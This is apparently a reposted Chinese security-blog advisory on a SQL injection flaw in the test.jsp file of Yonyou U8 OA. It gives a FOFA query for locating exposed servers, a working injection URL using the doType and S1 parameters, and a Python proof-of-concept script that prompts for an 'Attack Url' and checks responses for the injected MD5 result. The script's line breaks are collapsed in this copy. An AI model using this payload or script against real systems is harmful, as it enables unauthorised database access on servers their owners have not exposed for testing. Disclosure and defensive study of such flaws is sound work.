用友 U8 OA test.jsp SQL注入漏洞

admin 2023年7月5日14:14:58评论190 views字数 1354阅读4分30秒阅读模式

Tips用友OA产品漏洞

- 漏洞描述 -
用友 U8 OA test.jsp文件存在 SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞
 
- 影响范围 -
用友 U8

 

- FOFA -

"用友U8-OA"
- 漏洞复现 -

用友 U8 OA test.jsp SQL注入漏洞

POC

/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))

用友 U8 OA test.jsp SQL注入漏洞

POC请求包
import requestsimport sysimport randomimport refrom requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():    print('+------------------------------------------')    print('+  �33[34mTitle   : 用友 U8 OA test.jsp SQL注入漏洞                           �33[0m')    print('+  �33[36m使用格式:  python3 poc.py                                            �33[0m')    print('+  �33[36mFile         >>> ip.txt                             �33[0m')    print('+------------------------------------------')
def POC_1(target_url):    vuln_url = target_url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))"    headers = {        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",    }    try:        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)        if "c4ca4238a0b923820dcc509a6f75849b" in response.text and response.status_code == 200:            print("�33[32m[o] 目标 {}存在漏洞 n[o] 响应地址: {} �33[0m".format(target_url, vuln_url))        else:            print("�33[31m[x] 目标 {}不存在漏洞 �33[0m".format(target_url))    except Exception as e:        print("�33[31m[x] 目标 {} 请求失败 �33[0m".format(target_url))
if __name__ == '__main__':    title()    target_url = str(input("�33[35mPlease input Attack UrlnUrl >>> �33[0m"))    POC_1(target_url)

end

 

原文始发于微信公众号(安全攻防渗透):知识分享18:用友 U8 OA test.jsp SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月5日14:14:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友 U8 OA test.jsp SQL注入漏洞https://cn-sec.com/archives/1852442.html

发表评论

匿名网友 填写信息